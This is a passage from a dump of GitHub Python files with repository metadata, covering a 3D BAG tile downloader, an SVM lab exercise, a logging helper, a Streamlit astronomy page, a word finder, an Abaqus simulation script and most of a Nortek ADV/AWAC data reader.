logging.info('creating output directory...')\n path = Path(args.pathname)\n projectname = path.stem\n path.mkdir(parents=True, exist_ok=True)\n\n logging.info('downloading tiles...')\n tilesdir = path / 'cityjson'\n tilesdir.mkdir(exist_ok=True)\n fnames = download_3dbag(tids, tilesdir)\n \n logging.info('export to obj...')\n objpath = (path / projectname).with_suffix('.obj')\n blendpath = (path / projectname).with_suffix('.blend')\n blendpy = path / 'blendersetup.py'\n prep_for_blender(fnames, objpath, origin_offset=args.poi)\n\n logging.info('preppring blend file')\n with open( blendpy, 'w' ) as f:\n f.write(\"import bpy\\n\")\n f.write(\"bpy.ops.import_scene.obj(filepath='{}', filter_glob='*.obj;*.mtl', use_edges=False, use_smooth_groups=False, use_split_objects=False, use_split_groups=False, use_groups_as_vgroups=False, use_image_search=False, split_mode='OFF', axis_forward='Y', axis_up='Z')\\n\".format( objpath ))\n f.write(\"bpy.ops.wm.save_as_mainfile(filepath='{}')\\n\".format(blendpath))\n \n subprocess.run(['/home/rypeters/blender-2.93.5-linux-x64/blender', 'base.blend', '--background', '--python', blendpy])\n","repo_name":"Ylannl/3dbag-scripts","sub_path":"tiledownloader.py","file_name":"tiledownloader.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"34541166356","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 12 13:18:56 2020\r\n\r\n@author: nishi\r\n\"\"\"\r\n\r\nimport pandas as 
pd\r\ndata=pd.read_csv('Social_Network_Ads.csv')\r\ndata.size\r\nx=data.iloc[:,1:4].values\r\ny=data.iloc[:,4].values\r\nprint(x)\r\nprint(y)\r\nfrom sklearn.preprocessing import LabelEncoder\r\nlabelencoder=LabelEncoder()\r\nx[:,0]=labelencoder.fit_transform(x[:,0])\r\nprint(x)\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.30,random_state=0)\r\nfrom sklearn.preprocessing import StandardScaler\r\nst= StandardScaler() \r\nx_train=st.fit_transform(x_train) \r\nx_test=st.transform(x_test)\r\nfrom sklearn.svm import SVC\r\nclf=SVC(kernel='linear')\r\nprint(x_train)\r\nprint(x_test)\r\nclf.fit(x_train,y_train)\r\ny_prod=clf.predict(x_test)\r\n\r\nfrom sklearn.metrics import classification_report,confusion_matrix,accuracy_score\r\nprint(confusion_matrix(y_test,y_prod))\r\nprint(classification_report(y_test,y_prod))\r\nprint('accuracy',accuracy_score(y_test,y_prod))\r\n\r\n\r\nfrom sklearn.svm import SVR \r\nclf=SVR(kernel='linear')\r\nprint(x_train)\r\nprint(x_test)\r\nclf.fit(x_train,y_train)\r\ny_prod=clf.predict(x_test)","repo_name":"nishitabihani19/Machine-Learnings-Algorithms","sub_path":"lab5_hsv.py","file_name":"lab5_hsv.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71609705051","text":"from __future__ import absolute_import\nimport os\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\n\n## this class displays the session log history\nclass QPlainTextEditLogger(logging.Handler):\n    \"\"\"session log history\n\n    Args:\n        logging (logging.Handler): log message handler\n    \"\"\"\n\n    def __init__(self, widget):\n        \"\"\"the constructor\n\n        Args:\n            widget (QWidget): parent widget\n        \"\"\"\n        super().__init__()\n        self.widget = widget\n        # settings for the widget are in the `logHistoryDialog.ui` file\n\n    def emit(self, record):\n        \"\"\"emits changes\n\n        Args:\n            record (str): log message\n        \"\"\"\n        self.widget.appendPlainText(Logger.log_formatter.format(record))\n\n\n## logging api\nclass Logger(object):\n    \"\"\"logging api\n\n    Args:\n        object (object): base object specialization\n    \"\"\"\n\n    level_lookup = {\n        10: \"DEBUG\",\n        20: \"INFO\",\n        30: \"WARNING\",\n        40: \"ERROR\",\n        50: \"CRITICAL\",\n    }\n    session_log_level = logging.INFO  # global log level\n\n    # log filesize\n    # kb = 2^10 == 1024 bytes\n    kb = 2**10\n    # mb = 2^2^10 == 1048576 bytes\n    mb = 2**2**10\n\n    ## log filename\n    log_filename = \"cli_gen_tool.log\"\n\n    ## log format\n    log_format = \"%(asctime)s - [%(levelname)s] - (%(filename)s).%(funcName)s(line:%(lineno)d) - %(message)s\"\n\n    ## global formatter\n    log_formatter = logging.Formatter(log_format)\n\n    ## logging handlers\n    root_log_handler = None\n    stream_log_handler = None\n    file_log_handler = None\n    session_log_handler = None\n\n    ## the constructor\n    def __init__(self) -> None:\n        super(Logger, self).__init__()\n\n    def setup_logging(self, name):\n        root_log_handler = logging.getLogger(name)\n        root_log_handler.setLevel(Logger.session_log_level)\n        root_log_handler.info(\"logging service initialized\")\n        Logger.root_log_handler = root_log_handler\n        stream_log_handler = logging.StreamHandler()\n        stream_log_handler.setLevel(Logger.session_log_level)\n        stream_log_handler.setFormatter(Logger.log_formatter)\n        Logger.stream_log_handler = stream_log_handler\n        Logger.root_log_handler.addHandler(stream_log_handler)\n    \n    ## returns a logging object if setup_logging() has been called; else None\n    def 
get_root_logger(self):\n return Logger.root_log_handler\n\n ## returns a logging object if setup_logging() has been called; else None\n def get_stream_logger(self):\n return Logger.stream_log_handler\n\n ## returns a logging object if setup_logging() and setup_file_handler() have been called and completed successfully; else None\n def get_file_handler(self):\n return Logger.file_log_handler\n\n ## This is called to set up the log file handler in MainWindow.__init__()\n def setup_file_handler(self):\n \"\"\"sets up log file handler, requires Pathing.set_pathing()\"\"\"\n # logfile pathing\n if not os.path.isdir(self.logs_path):\n return -1\n # log filehandler\n file_log_handler = RotatingFileHandler(f\"{self.logs_path}{os.path.sep}{Logger.log_filename}\",\n \"a\",\n 10 * Logger.mb,\n backupCount=5,\n )\n file_log_handler.setLevel(Logger.session_log_level)\n file_log_handler.setFormatter(Logger.log_formatter)\n Logger.root_log_handler.info(\n f\"Log file path: {self.logs_path}{os.path.sep}{Logger.log_filename}\"\n )\n Logger.file_log_handler = file_log_handler\n return file_log_handler\n\n ## each module that logs gets a child logger from the root logger\n def get_child_logger(self, name):\n return Logger.root_log_handler.getChild(name)\n\n ## sets up window log history\n def set_up_window_history_logger(self, widget):\n \"\"\"sets up session log history app window\n\n Args:\n widget (QWidget): session log history container\n \"\"\"\n Logger.session_log_handler = QPlainTextEditLogger(widget)\n Logger.root_log_handler.addHandler(Logger.session_log_handler)\n\n ## sets handler log levels\n def set_log_levels(self):\n \"\"\"sets log levels\"\"\"\n self.parent_instance.root_log_handler.setLevel(Logger.session_log_level)\n self.parent_instance.file_log_handler.setLevel(Logger.session_log_level)\n self.parent_instance.stream_log_handler.setLevel(Logger.session_log_level)\n self.parent_instance.session_log_handler.setLevel(Logger.session_log_level)\n\n\n# end of file\n","repo_name":"dstroy0/InputHandler","sub_path":"tools/cli_gen_tool_src/modules/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"29982194527","text":"\ndef century(year):\n word=str(year)\n l1=word[0:2]\n cen=int(l1)+1\n if year>2000:\n return str(cen)+\"st century\"\n if word[1:4]==\"000\":\n return word[0:2]+\"th century\"\n else:\n return str(cen)+\"th century\"\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"eAnhzXPeGbobqk2P2_6.py","file_name":"eAnhzXPeGbobqk2P2_6.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32413857783","text":"import streamlit as st\n#https://pypi.org/project/streamlit-image-comparison/\n#from streamlit_image_comparison import image_comparison\nfrom side_logo_func import add_logo, add_logo_t\n\n\n# set page config\nst.set_page_config(page_title=\"Literature\", layout=\"centered\")\n\nst.title(\"Literature\")\n\nimage_logo = \"https://raw.githubusercontent.com/ringgalaxies/ringgalaxies.github.io/main/images/RingLogoMini.png\"\n\nadd_logo(image_logo)\nadd_logo_t()\n\nst.subheader('Data')\n\nst.markdown('In this project, we are using HI data obtained through our observations \\\n\tand those available in the Australia Telescope Compact Array (ATCA) archive.')\n\nst.markdown('Images from DSS, WISE, 2MASS and GALEX survey are obtained through publicly available 
sources.')\n\nst.subheader('Python Packages')\n\nst.markdown('We are using the following Python packages: astropy, aplpy, matplotlib, cmasher and streamlit_image_comparison')\n\nst.write(\"Colormaps: Viridis & Magma are from Matplotlib. Amber, Horizon, Gem, Toxic,\\\n\t\t\t\t\tOcean, Bubblegum, Rainforest, Sepia and Eclipse are from Cmasher.\")\n\nst.subheader('Publication')\n\nst.markdown(\"\"\"[**The HI in Ring Galaxies Survey (HI-RINGS) - Effects of the bar on the HI gas in ring galaxies**](https://arxiv.org/pdf/2304.00515.pdf)\"\"\")\n","repo_name":"ringgalaxies/HIRingGalaxies","sub_path":"pages/03_Literature.py","file_name":"03_Literature.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"16367806029","text":"\"\"\"Word Finder: finds random words from a dictionary.\"\"\"\nfrom random import randint as rand\n\nclass WordFinder:\n    \"\"\"\n    Class to return random words from a given file of words\n    \"\"\"\n    def __init__(self, path):\n        \"\"\"Create instance with path to a file on disk that contains words, one per line, read the file at that path, make an attribute list of those words, print word list length\n        \n        >>> wf = WordFinder(\"words.txt\")\n        235886 words read\n        \n        >>> wf.random() in wf.words\n        True\n\n        >>> wf.random() in wf.words\n        True\n\n        >>> wf.random() in wf.words\n        True\n\n        >>> wf.random() in wf.words\n        True\n\n\n        \"\"\"\n        self.path = path\n        self.words = []\n        fhand = open(self.path, 'r')\n        for line in fhand.readlines():\n            self.words.append(line.strip())\n        fhand.close()\n        self.print_word_list_length()\n\n    \n    def print_word_list_length(self):\n        \"\"\"Print length of self.words\"\"\"\n        print(f\"{len(self.words)} words read\")\n    \n\n    def random(self):\n        \"\"\"Return a random word from the instance's list of words\"\"\"\n        randint = rand(0, len(self.words) - 1)\n        return self.words[randint]\n\n\n\nclass SpecialWordFinder(WordFinder):\n    def __init__(self, path):\n        \"\"\"Create instance with path to a file on disk that contains words, one per line, read the file at that path, make an attribute list of those words if they aren't common or blank, print word list length\n        \n        >>> swf = SpecialWordFinder(\"words.txt\")\n        235886 words read\n\n        >>> swf.random() in swf.words\n        True\n\n        >>> swf.random() in swf.words\n        True\n\n        >>> swf.random() in swf.words\n        True\n\n        >>> swf.random() in swf.words\n        True\n        \n        \"\"\"\n        self.path = path\n        self.words = []\n        fhand = open(self.path, 'r')\n        for line in fhand.readlines():\n            if not line.startswith(\"#\") and not line.strip() == \"\":\n                self.words.append(line.strip())\n        fhand.close()\n        self.print_word_list_length()\n","repo_name":"KCCPMG/python-oo-practice","sub_path":"wordfinder.py","file_name":"wordfinder.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25976219631","text":"#Made by J.T.B. 
Overvelde on 9 may 2011\n\n#copy model and delete old steps\nmdb.Model(name=modelName2, objectToCopy=mdb.models[modelName1])\ndel mdb.models[modelName2].steps[stepName1]\n\n#steps\nmdb.models[modelName2].StaticStep(nlgeom=ON, initialInc=maxIncr, minInc=1e-6, \n maxInc=maxIncr, maxNumInc=maxNumIncr, name=stepName2, previous='Initial',\n contactSolutions=10,contactIterations=300,applyContactIterations=True)\n\n#BC\nmdb.models[modelName2].DisplacementBC(amplitude=UNSET, buckleCase=\n PERTURBATION_AND_BUCKLING, createStepName=stepName2, distributionType=\n UNIFORM, fieldName='', fixed=OFF, localCsys=None, name='BC-1', region=\n mdb.models[modelName1].rootAssembly.instances[instRefName1].sets['VIRTUAL1']\n , u1=UNSET, u2=0.0, ur3=UNSET)\nmdb.models[modelName2].DisplacementBC(amplitude=UNSET, buckleCase=\n PERTURBATION_AND_BUCKLING, createStepName=stepName2, distributionType=\n UNIFORM, fieldName='', fixed=OFF, localCsys=None, name='BC-2', region=\n mdb.models[modelName1].rootAssembly.instances[instRefName2].sets['VIRTUAL2'] \n , u1=0.0, u2=UNSET, ur3=UNSET)\nmdb.models[modelName2].DisplacementBC(amplitude=UNSET, buckleCase=\n PERTURBATION_AND_BUCKLING, createStepName=stepName2, distributionType=\n UNIFORM, fieldName='', fixed=OFF, localCsys=None, name='BC-3', region=\n mdb.models[modelName1].rootAssembly.instances[instRefName2].sets['VIRTUAL2']\n , u1=UNSET, u2=-stepSize*GridSpaceY*numHolesY, ur3=UNSET)\nmdb.models[modelName2].DisplacementBC(amplitude=UNSET, buckleCase=\n PERTURBATION_AND_BUCKLING, createStepName=stepName2, distributionType=\n UNIFORM, fieldName='', fixed=OFF, localCsys=None, name='BC-4', region=\n mdb.models[modelName1].rootAssembly.instances[instName1].sets['vertic3'], \n u1=0, u2=0, ur3=UNSET)\n\n#contact\nmdb.models[modelName2].ContactProperty('IntProp-1')\nmdb.models[modelName2].interactionProperties['IntProp-1'].NormalBehavior(\n\t allowSeparation=ON, constraintEnforcementMethod=DEFAULT, \n\t pressureOverclosure=HARD)\nfor i in range(0,len(CenSide)):\n\tmdb.models[modelName2].SelfContactStd(createStepName=stepName2, \n \t interactionProperty='IntProp-1', name='Int-'+str(i), smooth=0.2, surface=\n \t mdb.models[modelName2].rootAssembly.instances[instName1].surfaces['Surf-'+str(i)])\n\n#apply imperfection\nodb = openOdb(path=tDr+'/'+jobName1+'.odb')\nFrame1 = odb.steps[stepName1].frames[1]\ndisplacement=Frame1.fieldOutputs['U']\nfieldValues=displacement.values\nCoor=zeros((len(mdb.models[modelName2].parts[partName1].nodes),3),Float)\nrep=0\nfor i in mdb.models[modelName2].parts[partName1].nodes:\n\tCoor[i.label-1][0]=i.coordinates[0]+imperf*fieldValues[i.label-1].data[0]\n\tCoor[i.label-1][1]=i.coordinates[1]+imperf*fieldValues[i.label-1].data[1]\n\tCoor[i.label-1][2]=0.0\n\trep=rep+1\nmdb.models[modelName2].parts[partName1].editNode(\n nodes=mdb.models[modelName2].parts[partName1].nodes,\n coordinates=Coor)\nodb.close()\n","repo_name":"quisten/abaqusPython","sub_path":"Kernel Scripts/Python Example Script/AbaqusFiles/Pois-BcSteps2.py","file_name":"Pois-BcSteps2.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"32"} +{"seq_id":"71638522011","text":"import warnings\nimport logging\nimport numpy as np\nfrom struct import unpack\nfrom pathlib import Path\nfrom datetime import datetime\n\nfrom . import nortek_defs\nfrom .. 
import time\nfrom .base import _find_userdata, _create_dataset, _handle_nan, _abspath\nfrom ..tools import misc as tbx\nfrom ..rotate.vector import _calc_omat\nfrom ..rotate.base import _set_coords\nfrom ..rotate import api as rot\n\n\ndef read_nortek(filename, userdata=True, debug=False, do_checksum=False,\n nens=None, **kwargs):\n \"\"\"Read a classic Nortek (AWAC and Vector) datafile\n\n Parameters\n ----------\n filename : string\n Filename of Nortek file to read.\n userdata : True, False, or string of userdata.json filename\n (default ``True``) Whether to read the '.userdata.json'\n file.\n debug : bool (default: False)\n Logs debugger ouput if true\n do_checksum : bool (default False)\n Whether to perform the checksum of each data block.\n nens : None, int or 2-element tuple (start, stop)\n Number of pings or ensembles to read from the file. \n Default is None, read entire file\n\n Returns\n -------\n ds : xarray.Dataset\n An xarray dataset from the binary instrument data\n \"\"\"\n\n # Start debugger logging\n if debug:\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n filepath = Path(filename)\n logfile = filepath.with_suffix('.log')\n logging.basicConfig(filename=str(logfile),\n filemode='w',\n level=logging.NOTSET,\n format='%(name)s - %(levelname)s - %(message)s')\n\n userdata = _find_userdata(filename, userdata)\n\n with _NortekReader(filename, debug=debug, do_checksum=do_checksum,\n nens=nens) as rdr:\n rdr.readfile()\n rdr.dat2sci()\n dat = rdr.data\n\n # Remove trailing nan's in time and orientation data\n dat = _handle_nan(dat)\n\n # Search for missing timestamps and interpolate them\n coords = dat['coords']\n t_list = [t for t in coords if 'time' in t]\n for ky in t_list:\n tdat = coords[ky]\n tdat[tdat == 0] = np.NaN\n if np.isnan(tdat).any():\n tag = ky.lstrip('time')\n warnings.warn(\"Zero/NaN values found in '{}'. Interpolating and \"\n \"extrapolating them. 
To identify which values were filled later, \"\n \"look for 0 values in 'status{}'\".format(ky, tag))\n tdat = time._fill_time_gaps(\n tdat, sample_rate_hz=dat['attrs']['fs'])\n coords[ky] = time.epoch2dt64(tdat).astype('datetime64[ns]')\n\n # Apply rotation matrix and declination\n rotmat = None\n declin = None\n for nm in userdata:\n if 'rotmat' in nm:\n rotmat = userdata[nm]\n elif 'dec' in nm:\n declin = userdata[nm]\n else:\n dat['attrs'][nm] = userdata[nm]\n\n # Create xarray dataset from upper level dictionary\n ds = _create_dataset(dat)\n ds = _set_coords(ds, ref_frame=ds.coord_sys)\n\n if 'orientmat' not in ds:\n ds['orientmat'] = _calc_omat(ds['time'],\n ds['heading'],\n ds['pitch'],\n ds['roll'],\n ds.get('orientation_down', None))\n\n if rotmat is not None:\n rot.set_inst2head_rotmat(ds, rotmat, inplace=True)\n if declin is not None:\n rot.set_declination(ds, declin, inplace=True)\n\n # Close handler\n if debug:\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n handler.close()\n\n return ds\n\n\ndef _bcd2char(cBCD):\n \"\"\"Taken from the Nortek System Integrator Manual \n \"Example Program\" Chapter.\n \"\"\"\n cBCD = min(cBCD, 153)\n c = (cBCD & 15)\n c += 10 * (cBCD >> 4)\n return c\n\n\ndef _bitshift8(val):\n return val >> 8\n\n\ndef _int2binarray(val, n):\n out = np.zeros(n, dtype='bool')\n for idx, n in enumerate(range(n)):\n out[idx] = val & (2 ** n)\n return out\n\n\nclass _NortekReader():\n \"\"\"A class for reading reading nortek binary files.\n This reader currently only supports AWAC and Vector data formats.\n\n Parameters\n ----------\n fname : string\n Nortek filename to read.\n endian : {'<','>'} (optional)\n Specifies if the file is in 'little' or 'big' endian format. By\n default the reader will attempt to determine this.\n debug : {True, False*} (optional)\n Print debug/progress information?\n do_checksum : {True*, False} (optional)\n Specifies whether to perform the checksum.\n bufsize : int (default 100000)\n The size of the read buffer to use.\n nens : None (default: None, read all files), int, or 2-element tuple (start, stop).\n The number of pings to read from the file. By default, the entire file\n is read.\n \"\"\"\n\n _lastread = [None, None, None, None, None]\n fun_map = {'0x00': 'read_user_cfg',\n '0x04': 'read_head_cfg',\n '0x05': 'read_hw_cfg',\n '0x07': 'read_vec_checkdata',\n '0x10': 'read_vec_data',\n '0x11': 'read_vec_sysdata',\n '0x12': 'read_vec_hdr',\n '0x71': 'read_microstrain',\n '0x20': 'read_awac_profile',\n }\n\n def __init__(self, fname, endian=None, debug=False,\n do_checksum=True, bufsize=100000, nens=None):\n self.fname = fname\n self._bufsize = bufsize\n self.f = open(_abspath(fname), 'rb', 1000)\n self.do_checksum = do_checksum\n self.filesize # initialize the filesize.\n self.debug = debug\n self.c = 0\n self._dtypes = []\n self._n_start = 0\n try:\n len(nens)\n except TypeError:\n # not a tuple, so we assume None or int\n self._npings = nens\n else:\n if len(nens) != 2:\n raise TypeError('nens must be: None (), int, or len 2')\n warnings.warn(\"A 'start ensemble' is not yet supported \"\n \"for the Nortek reader. This function will read \"\n \"the entire file, then crop the beginning at \"\n \"nens[0].\")\n self._npings = nens[1]\n self._n_start = nens[0]\n if endian is None:\n if unpack('HH', self.read(4)) == (1445, 24):\n endian = '>'\n else:\n raise Exception(\"I/O error: could not determine the \"\n \"'endianness' of the file. 
Are you sure this is a Nortek \"\n \"file?\")\n self.endian = endian\n self.f.seek(0, 0)\n\n # This is the configuration data:\n self.config = {}\n err_msg = (\"I/O error: The file does not \"\n \"appear to be a Nortek data file.\")\n # Read the header:\n if self.read_id() == 5:\n self.read_hw_cfg()\n else:\n raise Exception()\n if self.read_id() == 4:\n self.read_head_cfg()\n else:\n raise Exception(err_msg)\n if self.read_id() == 0:\n self.read_user_cfg()\n else:\n raise Exception(err_msg)\n if self.config['hdw']['serial_number'][0:3].upper() == 'WPR':\n self.config['config_type'] = 'AWAC'\n elif self.config['hdw']['serial_number'][0:3].upper() == 'VEC':\n self.config['config_type'] = 'ADV'\n # Initialize the instrument type:\n self._inst = self.config.pop('config_type')\n # This is the position after reading the 'hardware',\n # 'head', and 'user' configuration.\n pnow = self.pos\n\n # Run the appropriate initialization routine (e.g. init_ADV).\n getattr(self, 'init_' + self._inst)()\n self.f.close() # This has a small buffer, so close it.\n # This has a large buffer...\n self.f = open(_abspath(fname), 'rb', bufsize)\n self.close = self.f.close\n if self._npings is not None:\n self.n_samp_guess = self._npings\n self.f.seek(pnow, 0) # Seek to the previous position.\n\n da = self.data['attrs']\n if self.config['n_burst'] > 0:\n fs = round(self.config['fs'], 7)\n da['duty_cycle_n_burst'] = self.config['n_burst']\n da['duty_cycle_interval'] = self.config['burst_interval']\n if fs > 1:\n burst_seconds = self.config['n_burst']/fs\n else:\n burst_seconds = round(1/fs, 3)\n da['duty_cycle_description'] = \"{} second bursts collected at {} Hz, with bursts taken every {} minutes\".format(\n burst_seconds, fs, self.config['burst_interval']/60)\n self.burst_start = np.zeros(self.n_samp_guess, dtype='bool')\n da['fs'] = self.config['fs']\n da['coord_sys'] = {'XYZ': 'inst',\n 'ENU': 'earth',\n 'beam': 'beam'}[self.config['coord_sys_axes']]\n da['has_imu'] = 0 # Initiate attribute\n if self.debug:\n logging.info('Init completed')\n\n @property\n def filesize(self,):\n if not hasattr(self, '_filesz'):\n pos = self.pos\n self.f.seek(0, 2)\n # Seek to the end of the file to determine the filesize.\n self._filesz = self.pos\n self.f.seek(pos, 0) # Return to the initial position.\n return self._filesz\n\n @property\n def pos(self,):\n return self.f.tell()\n\n def init_ADV(self,):\n dat = self.data = {'data_vars': {}, 'coords': {}, 'attrs': {},\n 'units': {}, 'long_name': {}, 'standard_name': {},\n 'sys': {}}\n da = dat['attrs']\n dv = dat['data_vars']\n da['inst_make'] = 'Nortek'\n da['inst_model'] = 'Vector'\n da['inst_type'] = 'ADV'\n da['rotate_vars'] = ['vel']\n dv['beam2inst_orientmat'] = self.config.pop('beam2inst_orientmat')\n self.config['fs'] = 512 / self.config['awac']['avg_interval']\n da.update(self.config['usr'])\n da.update(self.config['adv'])\n da.update(self.config['head'])\n da.update(self.config['hdw'])\n\n # No apparent way to determine how many samples are in a file\n dlta = self.code_spacing('0x11')\n self.n_samp_guess = int(self.filesize / dlta + 1)\n self.n_samp_guess *= int(self.config['fs'])\n\n def init_AWAC(self,):\n dat = self.data = {'data_vars': {}, 'coords': {}, 'attrs': {},\n 'units': {}, 'long_name': {}, 'standard_name': {},\n 'sys': {}}\n da = dat['attrs']\n dv = dat['data_vars']\n da['inst_make'] = 'Nortek'\n da['inst_model'] = 'AWAC'\n da['inst_type'] = 'ADCP'\n dv['beam2inst_orientmat'] = self.config.pop('beam2inst_orientmat')\n da['rotate_vars'] = ['vel']\n 
self.config['fs'] = 1. / self.config['awac']['avg_interval']\n da.update(self.config['usr'])\n da.update(self.config['awac'])\n da.update(self.config['head'])\n da.update(self.config['hdw'])\n\n space = self.code_spacing('0x20')\n if space == 0:\n # code spacing is zero if there's only 1 profile\n self.n_samp_guess = 1\n else:\n self.n_samp_guess = int(self.filesize / space + 1)\n\n def read(self, nbyte):\n byts = self.f.read(nbyte)\n if not (len(byts) == nbyte):\n raise EOFError('Reached the end of the file')\n return byts\n\n def findnext(self, do_cs=True):\n \"\"\"Find the next data block by checking the checksum and the\n sync byte(0xa5)\n \"\"\"\n sum = np.uint16(int('0xb58c', 0)) # Initialize the sum\n cs = 0\n func = _bitshift8\n func2 = np.uint8\n if self.endian == '<':\n func = np.uint8\n func2 = _bitshift8\n while True:\n val = unpack(self.endian + 'H', self.read(2))[0]\n if func(val) == 165 and (not do_cs or cs == np.uint16(sum)):\n self.f.seek(-2, 1)\n return hex(func2(val))\n sum += cs\n cs = val\n\n def read_id(self,):\n \"\"\"Read the next 'ID' from the file.\n \"\"\"\n self._thisid_bytes = bts = self.read(2)\n tmp = unpack(self.endian + 'BB', bts)\n if self.debug:\n logging.info('Position: {}, codes: {}'.format(self.f.tell(), tmp))\n if tmp[0] != 165: # This catches a corrupted data block.\n if self.debug:\n logging.warning(\"Corrupted data block sync code (%d, %d) found \"\n \"in ping %d. Searching for next valid code...\" %\n (tmp[0], tmp[1], self.c))\n val = int(self.findnext(do_cs=False), 0)\n self.f.seek(2, 1)\n if self.debug:\n logging.debug(\n ' ...FOUND {} at position: {}.'.format(val, self.pos))\n return val\n return tmp[1]\n\n def readnext(self,):\n id = '0x%02x' % self.read_id()\n if id in self.fun_map:\n func_name = self.fun_map[id]\n out = getattr(self, func_name)() # Should return None\n self._lastread = [func_name[5:]] + self._lastread[:-1]\n return out\n else:\n logging.warning('Unrecognized identifier: ' + id)\n self.f.seek(-2, 1)\n return 10\n\n def readfile(self, nlines=None):\n print('Reading file %s ...' 
% self.fname)\n retval = None\n try:\n while not retval:\n if self.c == nlines:\n break\n retval = self.readnext()\n if retval == 10:\n self.findnext()\n retval = None\n if self._npings is not None and self.c >= self._npings:\n if 'microstrain' in self._dtypes:\n try:\n self.readnext()\n except:\n pass\n break\n except EOFError:\n if self.debug:\n logging.info(' end of file at {} bytes.'.format(self.pos))\n else:\n if self.debug:\n logging.info(' stopped at {} bytes.'.format(self.pos))\n self.c -= 1\n _crop_data(self.data, slice(0, self.c), self.n_samp_guess)\n\n def findnextid(self, id):\n if id.__class__ is str:\n id = int(id, 0)\n nowid = None\n while nowid != id:\n nowid = self.read_id()\n if nowid == 16:\n shift = 22\n else:\n sz = 2 * unpack(self.endian + 'H', self.read(2))[0]\n shift = sz - 4\n self.f.seek(shift, 1)\n return self.pos\n\n def code_spacing(self, searchcode, iternum=50):\n \"\"\"Find the spacing, in bytes, between a specific hardware code.\n Repeat this * iternum * times(default 50).\n Returns the average spacing, in bytes, between the code.\n \"\"\"\n p0 = self.findnextid(searchcode)\n for i in range(iternum):\n try:\n self.findnextid(searchcode)\n except EOFError:\n break\n if self.debug:\n logging.info('p0={}, pos={}, i={}'.format(p0, self.pos, i))\n # Compute the average of the data size:\n return (self.pos - p0) / (i + 1)\n\n def checksum(self, byts):\n \"\"\"Perform a checksum on `byts` and read the checksum value.\n \"\"\"\n if self.do_checksum:\n if not np.sum(unpack(self.endian + str(int(1 + len(byts) / 2)) + 'H',\n self._thisid_bytes + byts)) + \\\n 46476 - unpack(self.endian + 'H', self.read(2)):\n\n raise Exception(\"CheckSum Failed at {}\".format(self.pos))\n else:\n self.f.seek(2, 1)\n\n def read_user_cfg(self,):\n # ID: '0x00 = 00\n if self.debug:\n logging.info('Reading user configuration (0x00) ping #{} @ {}...'\n .format(self.c, self.pos))\n cfg_u = self.config\n byts = self.read(508)\n # the first two bytes are the size.\n tmp = unpack(self.endian +\n '2x18H6s4HI9H90H80s48xH50x6H4xH2x2H2xH30x8H',\n byts)\n cfg_u['usr'] = {}\n cfg_u['adv'] = {}\n cfg_u['awac'] = {}\n\n cfg_u['transmit_pulse_length_m'] = tmp[0] # counts\n cfg_u['blank_dist'] = tmp[1] # overridden below\n cfg_u['receive_length_m'] = tmp[2] # counts\n cfg_u['time_between_pings'] = tmp[3] # counts\n cfg_u['time_between_bursts'] = tmp[4] # counts\n cfg_u['adv']['n_pings_per_burst'] = tmp[5]\n cfg_u['awac']['avg_interval'] = tmp[6]\n cfg_u['usr']['n_beams'] = tmp[7]\n TimCtrlReg = _int2binarray(tmp[8], 16).astype(int)\n # From the nortek system integrator manual\n # (note: bit numbering is zero-based)\n cfg_u['usr']['profile_mode'] = [\n 'single', 'continuous'][TimCtrlReg[1]]\n cfg_u['usr']['burst_mode'] = str(bool(~TimCtrlReg[2]))\n cfg_u['usr']['power_level'] = TimCtrlReg[5] + 2 * TimCtrlReg[6] + 1\n cfg_u['usr']['sync_out_pos'] = ['middle', 'end', ][TimCtrlReg[7]]\n cfg_u['usr']['sample_on_sync'] = str(bool(TimCtrlReg[8]))\n cfg_u['usr']['start_on_sync'] = str(bool(TimCtrlReg[9]))\n cfg_u['PwrCtrlReg'] = _int2binarray(tmp[9], 16)\n cfg_u['A1'] = tmp[10]\n cfg_u['B0'] = tmp[11]\n cfg_u['B1'] = tmp[12]\n cfg_u['usr']['compass_update_rate'] = tmp[13]\n cfg_u['coord_sys_axes'] = ['ENU', 'XYZ', 'beam'][tmp[14]]\n cfg_u['usr']['n_bins'] = tmp[15]\n cfg_u['bin_length'] = tmp[16]\n cfg_u['burst_interval'] = tmp[17]\n cfg_u['usr']['deployment_name'] = tmp[18].partition(b'\\x00')[\n 0].decode('utf-8')\n cfg_u['usr']['wrap_mode'] = str(bool(tmp[19]))\n cfg_u['deployment_time'] = 
